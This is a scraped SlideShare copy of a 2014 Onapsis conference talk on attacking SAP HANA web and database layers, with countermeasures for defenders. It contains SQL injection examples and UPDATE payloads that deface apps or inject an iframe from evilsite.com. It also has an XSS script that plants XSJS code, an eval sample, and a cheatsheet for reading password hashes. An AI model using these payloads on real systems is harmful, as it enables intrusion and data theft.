SlideShare a Scribd company logo
1 of 50
Download to read offline
CONFIDENTIAL
NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 1
3/4/15 1
Ezequiel Gutesman
Blended Web and Database Attacks on Real-time,
In-Memory Platforms
2NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 2
Disclaimer
This publication is copyright 2014 Onapsis, Inc. – All rights reserved.
This publication contains references to the products of SAP AG. SAP, R/3, xApps, xApp, SAP NetWeaver, Duet, PartnerEdge, ByDesign,
SAP Business ByDesign, HANA, and other SAP products and services mentioned herein are trademarks or registered trademarks of SAP
AG in Germany and in several other countries all over the world.
SAP AG is neither the author nor the publisher of this publication and is not responsible for its content, and SAP Group shall not be liable
for errors or omissions with respect to the materials.
3NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 3
Agenda
 In-Memory Platforms
 HANA and the blended architecture
 Threat vectors for SAP HANA
 SQLi
 XSS and XSJS
 Rserve integration
 C/C++ post exploitation
 Conclusions
4In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 4NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 4
In-Memory Platforms/IMDB
5NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 5
• Simple concept
– DBMS that primarily relies on main memory for
computer data storage.
– “It has been predicted that in-memory computing will
be one of the Top 10 technologies of 2012” (Gartner)
– Why didn’t it happen before?
In-Memory Computing/IMDB
6In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 6NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 6
• Cost of physical memory going down
• Increasing amount of data being processed
• Higher requirements on system response
• Innovation!
– RT analytics
Reasons
7In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 7NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 7
• “It’s orders-of-magnitude faster—like the difference between walking and flying
in a plane” J. Loaiza, Oracle
• "In my 20 years in SAP I have never seen such innovation."
Rob Enslin, Head of Sales – SAP
Main vendors
• Oracle - Oracle 12c
• Microsoft - MS SQL Server 2014 (Hekaton)
• SAP - SAP HANA
Some quotes and examples of what this really means…
8In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 8NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 8
Motivation
9In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 9NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 9
SAP, SAP HANA and the blended
architecture
10NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 10
11NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 11
What is SAP?
Largest provider of business management solutions in the world.
● More than 250.000 implementations around the globe.
● More than 60.000 employees.
Used by Global Fortune-1000 companies, governmental organizations and
defense agencies to run their every-day business processes.
● Such as Revenue / Production / Expenditure business cycles.
SALES
PRODUCTION
FINANCIAL PLANNING
INVOICING
PROCUREMENT
TREASURY
LOGISTICS
PAYROLL
BILLING
12NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 12
What is SAP?
Largest provider of business management solutions in the world.
● More than 250.000 implementations around the globe.
● More than 60.000 employees.
Used by Global Fortune-1000 companies, governmental organizations and
defense agencies to run their every-day business processes.
● Such as Revenue / Production / Expenditure business cycles.
SALES
PRODUCTION
FINANCIAL PLANNING
INVOICING
PROCUREMENT
TREASURY
LOGISTICS
PAYROLL
BILLING
HANA is SAP’s star product… new customers and existing customers will be pushed
towards implementing HANA (both as back-end DB and application engine + DB)
13NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 13
A Business-Critical Infrastructure
● SAP and HANA systems store and process the most critical business information in
the Organization.
● If these platforms are breached, an intruder would be able to perform different attacks such
as:
ESPIONAGE: Obtain customers/vendors/human resources data, financial planning
information, balances, profits, sales information, manufacturing recipes, Stats & BI, etc.
SABOTAGE: Paralyze the operation of the organization by shutting down the
Applications running on HANA, disrupting interfaces with other systems and deleting
critical information, etc.
FRAUD: Modify financial information, tamper sales and purchase orders, create new
vendors, modify vendor bank account numbers, etc.
14In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 14NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 14
© 2014 SAP AG or an SAP affiliate company. All rights reserved.
• Full In-memory database
• Integrated HTTP Server
• Support for cloud implementations
• Integrations with calc engines (R, SQL)
• Diverse set of deployment options
• Massive memory requirements
• Used mainly for Business
Applications
SAP HANA
15In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 15NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 15
Attack Surface
http://help.sap.com/saphelp_hanaplatform/helpdata/en/37/d2573cb24e4d75a23e8577fb4f73b7/content.htm
• SQL/MDX port
• HTTP service
• SAP Host Agent and MC
• Outgoing connections
• Service Marketplace
• Solution Manager
• Mail servers
• Other Web Serves
• R servers
• SAP Support
16In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 16NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 16
Typical web application scenario
Typical web frameworks (asp, .NET, php, Django,…) use a DB connection configured
with a single, sometimes full-privileged user. On this scenario you will have:
• Application Level users
• Database user
• OS user to run HTTP server and DB server
A blended architecture
17In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 17NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 17
SAP HANA web application scenario
SAP HANA Web applications framework works differently. The application user is
the same as the DB user.
User privileges should be restricted at the DB level → The attack surface should be
restricted per user.
This requires:
• Web Application/Database user
• OS User running the DB (<dbsid>adm)
A blended architecture
18In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 18NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 18
Typical webapps
• SQLi could access the
whole database
• XSS is typically restricted
• Code stored on the
Filesystem
• OS commands can be
executed
SAP HANA webapps
• SQLi are restricted to the
user privileges
• XSS is more powerful by
default
• Code stored on the
Database
• Restricted OS comm.
execution
Impact of vulnerabilities
19In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 19NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 19
Programming Languages:
• XSJS or XS Javascript. This is HANA’s version of Server Side
Javascript. It is based on the SpiderMonkey Javascript engine.
API’s and libraries are detailed in the HANA doc
• Within the database, SQL and
SQLscript used to access the info
• R code / (L code for internal use).
• ABAP is also tuned to run faster on
HANA systems
• HTML5 for mobile apps
• C/C++
SAP HANA Concepts
20In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 20NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 20
HANA Studio: It is a full DB
client that can be used to
administrate the database
XS IDE: A developer can
create code to be deployed on
the web server using the XS
IDE available through the
HTTP/s interface.
http://hanaserver:8000/sap/hana/xs/ide/editor
SAP HANA Concepts
Development Environment
21In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 21NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 21
Attack vectors
on SAP HANA
22In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 22NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 22
sqli.xsjs
Because of HANA architecture, the
queries are executed in the context of the
user logged into the web application.
var conn = $.db.getConnection();
var pstmt =
conn.prepareStatement( "SELECT *
FROM accounts WHERE custID='" +
$.request.parameters.get("id"));
var rs = pstmt.executeQuery();
sqli.php
In most of the web application
frameworks, the unique credentials are
hardcoded into the application code or
configuration.
$conn = pg_connect("host=localhost
port=5432 user=postgres
password=123");
$query = "SELECT * FROM accounts
WHERE custID=’$id’";
$result = pg_query($conn, $query);
SQL Injection on HANA
23In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 23NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 23
sqli.xsjs
Because of HANA architecture, the
queries are executed in the context of the
user logged into the web application.
var conn = $.db.getConnection();
var pstmt =
conn.prepareStatement( "SELECT *
FROM accounts WHERE custID='" +
$.request.parameters.get("id"));
var rs = pstmt.executeQuery();
sqli.php
In most of the web application
frameworks, the unique credentials are
hardcoded into the application code or
configuration.
$conn = pg_connect("host=localhost
port=5432 user=postgres
password=123");
$query = "SELECT * FROM accounts
WHERE custID=’$id’";
$result = pg_query($conn, $query);
SQL Injection on HANA
It’s not only about WHAT is executed but more important about WHO executes it… so
SQL injection attacks can be blended with Social Engineering to make the attacks
more successful
24In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 24NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 24
UPDATE _SYS_REPO.ACTIVE_OBJECT
set CDATA=’$.response.addBody("<iframe src=’http://www.evilsite.com’ height=0 width=0></iframe>")’
where OBJECT_SUFFIX='html'
Well... it's a mix
UPDATE _SYS_REPO.ACTIVE_OBJECT
set CDATA=’$.response.addBody("PWNED")’
where OBJECT_NAME = 'demo'
Example 1: deface http://[ip]/demo/democode/demo.xsjs with “PWNED”:
Example 2: inject an attacker-controlled iframe in EVERY SINGLE APPLICATION:
PKG SUBPKG OBJ Predictable by application path!
iif the targeted user has write privileges over
_SYS_REPO.ACTIVE_OBJECT
25In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 25NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 25
Time-travel SQL Injection
26In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 26NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 26
SAP HANA HISTORY Tables
Reference : http://saphanatutorial.com/sap-hana-history-table/
SAP HANA Historical tables support time
travel queries. These are performed against
historical states of the database.
So unless the user specifically deletes the
historical data on the table, the information
will remain there.
History TABLES and SQL injections
27In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 27NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 27
• Create a HISTORY table
– CREATE HISTORY COLUMN TABLE NAME (…);
• List HISTORY tables
– SELECT * FROM SYS.TABLES WHERE SESSION_TYPE = 'HISTORY';
• Access the HISTORY information
– SELECT * FROM TABLE AS OF COMMIT ID XXXX; //may not work :S
– SELECT * FROM TABLE WITH PARAMETERS ('REQUEST_FLAGS'=
('ALLROWS'))
• Delete the HISTORY information
– MERGE HISTORY DELTA of TABLE;
History TABLES and SQL injection
28In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 28NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 28
DEMO
SQL injection on HISTORY tables
29In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 29NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 29
• Use prepareStatement within the XSJS code
• Never concatenate user input to a query string if it
was not validated - :P
• Restrict the privileges of all users, so they can
access only the information (and tables) they
need.
• Consider whether you REALLY need a HISTORY
table
Countermeasures on SQLi
30In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 30NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 30
XSS and derived threats
31In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 31NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 31
XSS attacks are extremely powerful with the built-in
functionality of the In-Memory platform: meet the
reposervice!
<script>
var xsjs_payload = "var conn=$.db.getConnection();
var pstmt=conn.prepareStatement('<INSERT UPDATE QUERY OR ANY OTHER QUERY>');
var rs = pstmt.executeQuery();";
attack();
function attack(){
$.ajax({
url: "/sap/hana/xs/ide/editor/server/repo/reposervice.xsjs?activate=false&mode=create&path=[path to
create the page]",
data: xsjs_payload,
type: "PUT",
dataType: "text",
contentType: "text/plain",
processData: false,
headers: { "X-CSRF-Token": securityToken },
});}
</script>
Cross Site Scripting
Get this from a request in the
payload
32In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 32NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 32
• Through different vulnerabilities, an attacker could be
able to modify/execute XSJS code
• If DB queries can be executed, the JS code itself can be
modified:
• Insecure ‘eval’ assignment:
$.response.contentType = "text/html";
var remotefn = eval($.request.parameters.get("eval"));
var eval_a = eval(remotefn);
$.response.setBody("RESULT:<p>"+eval_a);
XSJS Code
Impossible? See https://service.sap.com/sap/support/notes/2015446 from June 2014!
33In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 33NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 33
A note on the ICM
HANA “inherited” the ICM web server
From the documentation(*):
“For the ICM or a Web Dispatcher with
a release status of SAP NetWeaver 7.0
or below, the pattern used by the ICM
filter is, by default, a blacklist with the
following structure:
<s*script[^>]*>(.*)<s*/scripts*>”
(*) http://help.sap.com/saphelp_nw73/helpdata/en/4e/2606c0c61920cee10000000a42189c/content.htm?current_toc=/en/ae/ad1640033ae569e10000000a155106/plain.htm
34In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 34NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 34
DEMO
ICM (and HANA) Pattern filter
bypass
35In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 35NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 35
• Restrict packages exposed via http
• Secure authentication methods required for
package access
• Restrict Access privileges!
– System, Application,Object,Analytic,Package,Users
– Use restricted user types for HTTP apps.
• Enable Cross-Site-Request Forgery (XSRF) Protection
• Do not rely ONLY on Patterns or magic escapes
–Validate all parameters!
• Consider built-in helpers like HTML5 Sanitizer(*)
Countermeasures
(*)
http://help.sap.com/saphelp_hanaplatform/helpdata/en/23/15f02c34a04ed9b7ff6e79db44c701/content.htm?frameset=/en/91/f0bd316f4d1014b6dd926db0e91070/frameset.htm&current_toc=/en/d0/1cd0b7be7f441cb6
c56ad4577b428c/plain.htm&node_id=329
36In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 36NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 36
HANA/R Integration
37In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 37NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 37
SAP HANA can be integrated with R-server
“R is an open source programming language
and software environment for statistical
computing and graphics… The R language is
widely used for advanced data analysis.”
CREATE PROCEDURE MY_Func(OUT result
“SCHEMA".“TTYPE")
LANGUAGE RLANG AS
BEGIN
### RCODE HERE
END;
© 2014 SAP AG or an SAP affiliate company. All rights reserved.
Integration with R-lang
38In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 38NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 38
• R-Serve must be installed on a separate host
– Remote connections must be enabled
• R-serve exposes high privileged functions
– remote shutdown of the service
– os command execution (with the privileges of the user
running the server)
Attacks to the R Integration
39In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 39NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 39
• R-Serve must be configured to authenticate the
connections.
– No authentication means unauthenticated remote
compromise of the host.
– No restrictions on password strength or against
bruteforce
• R-Serve must be configured with transport-layer
crypto, however no documentation about its
support for HANA
– Authentication exchange?
– Sensitive information?
Attacks to the R Integration
40In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 40NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 40
DEMOS
“R-integrations”
41In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 41NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 41
• Secure the R-integration using transport-layer
crypto
• Configure authentication using strong credentials
• Restrict access to Rserve using a local firewall
• Use low-privileged accounts to run Rserve.
• Restrict shutdown ( and system?)
Countermeasures
42In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 42NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 42
HANA is coded in c/c++ and developers can interact with functions
developed in these languages:
• XSCFUNC: Interface to call c/c++ functions directly from the browser. It is used to
authenticate users, among other things.
• AFL (Application Function Library):
• Predictive Analysis Library: Defines functions that can be called from within
SQLScript procedures to perform analytic algorithms
• Business Function Library: Extends the computation ability of SAP HANA with
complex and performance-critical algorithms
sap/hana/xs/admin/config/config.xscfunc
{
"library": "libxsbase",
"factory": "createRuntimeConfigApp",
"method": "config"
}
Calling C/C++ functions
43In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 43NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 43
Demos
Post-exploitation cmd execution
44In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 44NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 44
Pentester
Cheatsheet!
45In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 45NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 45
Get Version
select version from M_DATABASE
List Code of XSJS WebApps
select CDATA from _SYS_REPO.ACTIVE_OBJECT where OBJECT_SUFFIX='xsjs'
List Privileges
select * from EFFECTIVE_PRIVILEGES where USER_NAME=‘USER'
select * from EFFECTIVE_ROLES WHERE USER_NAME =‘USER'
List Databases
select DATABASE_NAME from M_DATABASE
List Tables
select TABLE_NAME from M_TABLES
select TABLE_NAME from TABLE_COLUMNS where COLUMN_NAME LIKE '%[Q]%’
Pentester cheatsheet
46In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 46NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 46
List Columns
select COLUMN_NAME from TABLE_COLUMNS where TABLE_NAME=[TABLE_NAME]
Create User
CREATE USER my_user PASSWORD [PASSWORD];
List Password Hashes
select PASSWORD from SYS.P_USER_PASSWORD_ where OID=(select OID from
SYS.P_USERS_ where NAME='[USERNAME]')
Get Comments
/*COMMENT HERE*/ -- comment after dashes
Pentester cheatsheet
47In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 47NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 47
Conclusions
48In-Memory platforms www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 48NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 48
• Business critical applications (the crown jewels) are supported by the latest
technologies, therefore we must know how to secure them.
• With this new paradigm, the impact of vulnerabilities will be different and will
depend on several other factors. Old vulns could be critical.
• SAP HANA was built with a security focus, however many responsibilities rely on the
users (administrators, developers, end users…)
• Keep up with SAP Documentation (Thanks to the SAP PSRT):
– Read the SAP HANA Security Guide :
http://help.sap.com/hana/SAP_HANA_Security_Guide_en.pdf
– Follow SAP HANA Security Whitepaper which gives an overview of HANA Security as a
good starting point: http://www.saphana.com/docs/DOC-3751
– SAP HANA Developer Guide which contains information on secure programming practices:
http://help.sap.com/hana/SAP_HANA_Security_Guide_en.pdf
– A good guide which gives information on how to build standard roles in HANA:
https://scn.sap.com/docs/DOC-53974
Conclusions
49NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 49
To the research team
and specially to:
• Abraham, Sergio
• Perez-Etchegoyen, JP
• Russ, Fernando
• Sanchez, Nahuel
• Vandevanter, Will
Acknowledgements
50NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 50
Questions?
egutesman@onapsis.com
@gutes
Thanks

More Related Content

What's hot

How Hackers can Open the Safe and Take the Jewels
How Hackers can Open the Safe and Take the JewelsHow Hackers can Open the Safe and Take the Jewels
How Hackers can Open the Safe and Take the JewelsOnapsis Inc.
 
Penetration Testing SAP Systems
Penetration Testing SAP SystemsPenetration Testing SAP Systems
Penetration Testing SAP SystemsOnapsis Inc.
 
A Holistic View on SAP Security Why Securing Production Systems Is Not Enough
 	A Holistic View on SAP Security Why Securing Production Systems Is Not Enough 	A Holistic View on SAP Security Why Securing Production Systems Is Not Enough
A Holistic View on SAP Security Why Securing Production Systems Is Not EnoughOnapsis Inc.
 
Inception of the SAP Platform's Brain: Attacks on SAP Solution Manager
Inception of the SAP Platform's Brain: Attacks on SAP Solution ManagerInception of the SAP Platform's Brain: Attacks on SAP Solution Manager
Inception of the SAP Platform's Brain: Attacks on SAP Solution ManagerOnapsis Inc.
 
Onapsis SAP Backdoors
Onapsis SAP BackdoorsOnapsis SAP Backdoors
Onapsis SAP BackdoorsOnapsis Inc.
 
Cyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsCyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsOnapsis Inc.
 
Unbreakable oracle er_ps_siebel_jd_edwards
Unbreakable oracle er_ps_siebel_jd_edwardsUnbreakable oracle er_ps_siebel_jd_edwards
Unbreakable oracle er_ps_siebel_jd_edwardsOnapsis Inc.
 
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
 	Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC) 	Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)Onapsis Inc.
 
Your Crown Jewels Online: Further Attacks to SAP Web Applications (RSAConfe...
 	Your Crown Jewels Online: Further Attacks to SAP Web Applications (RSAConfe... 	Your Crown Jewels Online: Further Attacks to SAP Web Applications (RSAConfe...
Your Crown Jewels Online: Further Attacks to SAP Web Applications (RSAConfe...Onapsis Inc.
 
Sap penetration testing_defense_in_depth
Sap penetration testing_defense_in_depthSap penetration testing_defense_in_depth
Sap penetration testing_defense_in_depthIgor Igoroshka
 
All your SAP passwords belong to us
All your SAP passwords belong to usAll your SAP passwords belong to us
All your SAP passwords belong to usERPScan
 
Attacking SAP users with sapsploit
Attacking SAP users with sapsploit Attacking SAP users with sapsploit
Attacking SAP users with sapsploit ERPScan
 
Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)ERPScan
 
SAP SDM Hacking
SAP SDM HackingSAP SDM Hacking
SAP SDM HackingERPScan
 
Assessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsAssessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsERPScan
 
Attacking SAP Mobile
Attacking SAP MobileAttacking SAP Mobile
Attacking SAP MobileERPScan
 
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPERPScan
 
Securing SAP in 5 steps
Securing SAP in 5 stepsSecuring SAP in 5 steps
Securing SAP in 5 stepsERPScan
 
SAP security made easy
SAP security made easySAP security made easy
SAP security made easyERPScan
 

What's hot (20)

How Hackers can Open the Safe and Take the Jewels
How Hackers can Open the Safe and Take the JewelsHow Hackers can Open the Safe and Take the Jewels
How Hackers can Open the Safe and Take the Jewels
 
Penetration Testing SAP Systems
Penetration Testing SAP SystemsPenetration Testing SAP Systems
Penetration Testing SAP Systems
 
A Holistic View on SAP Security Why Securing Production Systems Is Not Enough
 	A Holistic View on SAP Security Why Securing Production Systems Is Not Enough 	A Holistic View on SAP Security Why Securing Production Systems Is Not Enough
A Holistic View on SAP Security Why Securing Production Systems Is Not Enough
 
Inception of the SAP Platform's Brain: Attacks on SAP Solution Manager
Inception of the SAP Platform's Brain: Attacks on SAP Solution ManagerInception of the SAP Platform's Brain: Attacks on SAP Solution Manager
Inception of the SAP Platform's Brain: Attacks on SAP Solution Manager
 
Onapsis SAP Backdoors
Onapsis SAP BackdoorsOnapsis SAP Backdoors
Onapsis SAP Backdoors
 
Cyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsCyber-attacks to SAP Systems
Cyber-attacks to SAP Systems
 
Unbreakable oracle er_ps_siebel_jd_edwards
Unbreakable oracle er_ps_siebel_jd_edwardsUnbreakable oracle er_ps_siebel_jd_edwards
Unbreakable oracle er_ps_siebel_jd_edwards
 
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
 	Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC) 	Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
 
Your Crown Jewels Online: Further Attacks to SAP Web Applications (RSAConfe...
 	Your Crown Jewels Online: Further Attacks to SAP Web Applications (RSAConfe... 	Your Crown Jewels Online: Further Attacks to SAP Web Applications (RSAConfe...
Your Crown Jewels Online: Further Attacks to SAP Web Applications (RSAConfe...
 
Sap penetration testing_defense_in_depth
Sap penetration testing_defense_in_depthSap penetration testing_defense_in_depth
Sap penetration testing_defense_in_depth
 
All your SAP passwords belong to us
All your SAP passwords belong to usAll your SAP passwords belong to us
All your SAP passwords belong to us
 
Attacking SAP users with sapsploit
Attacking SAP users with sapsploit Attacking SAP users with sapsploit
Attacking SAP users with sapsploit
 
Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)
 
Sap security – thinking with a hacker’s hat
Sap security – thinking with a hacker’s hatSap security – thinking with a hacker’s hat
Sap security – thinking with a hacker’s hat
 
SAP SDM Hacking
SAP SDM HackingSAP SDM Hacking
SAP SDM Hacking
 
Assessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsAssessing and Securing SAP Solutions
Assessing and Securing SAP Solutions
 
Attacking SAP Mobile
Attacking SAP MobileAttacking SAP Mobile
Attacking SAP Mobile
 
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
 
Securing SAP in 5 steps
Securing SAP in 5 stepsSecuring SAP in 5 steps
Securing SAP in 5 steps
 
SAP security made easy
SAP security made easySAP security made easy
SAP security made easy
 

Similar to Blended Web and Database Attacks on Real Time In-memory Platforms

NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database Attacks
NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database AttacksNSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database Attacks
NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database AttacksNoSuchCon
 
Sap fundamentals overview_for_sap_minors
Sap fundamentals overview_for_sap_minorsSap fundamentals overview_for_sap_minors
Sap fundamentals overview_for_sap_minorsCenk Ersoy
 
Inception of the SAP Platforms Brain: Attacks on SAP Solution Manager
Inception of the SAP Platforms Brain: Attacks on SAP Solution ManagerInception of the SAP Platforms Brain: Attacks on SAP Solution Manager
Inception of the SAP Platforms Brain: Attacks on SAP Solution ManagerOnapsis Inc.
 
SAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crimeSAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crimeOnapsis Inc.
 
Introduction to NEW SAP - Accenture Technology Meetup
Introduction to NEW SAP - Accenture Technology MeetupIntroduction to NEW SAP - Accenture Technology Meetup
Introduction to NEW SAP - Accenture Technology MeetupAccenture Hungary
 
Building Custom Advanced Analytics Applications with SAP HANA
Building Custom Advanced Analytics Applications with SAP HANABuilding Custom Advanced Analytics Applications with SAP HANA
Building Custom Advanced Analytics Applications with SAP HANASAP Technology
 
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?michelemanzotti
 
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...Accelerate2022-Solving the SAP Security Gap through Application-aware Network...
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...PeterSmetny1
 
Datameer6 for prospects - june 2016_v2
Datameer6 for prospects - june 2016_v2Datameer6 for prospects - june 2016_v2
Datameer6 for prospects - june 2016_v2Datameer
 
Developing and Deploying Applications on the SAP HANA Platform
Developing and Deploying Applications on the SAP HANA PlatformDeveloping and Deploying Applications on the SAP HANA Platform
Developing and Deploying Applications on the SAP HANA PlatformVitaliy Rudnytskiy
 
SAP HANA SPS10- Multitenant Database Containers
SAP HANA SPS10- Multitenant Database ContainersSAP HANA SPS10- Multitenant Database Containers
SAP HANA SPS10- Multitenant Database ContainersSAP Technology
 
Custom Development - SAP HANA
Custom Development - SAP HANACustom Development - SAP HANA
Custom Development - SAP HANAMichal Korzen
 
What is SAP API Management_.pdf
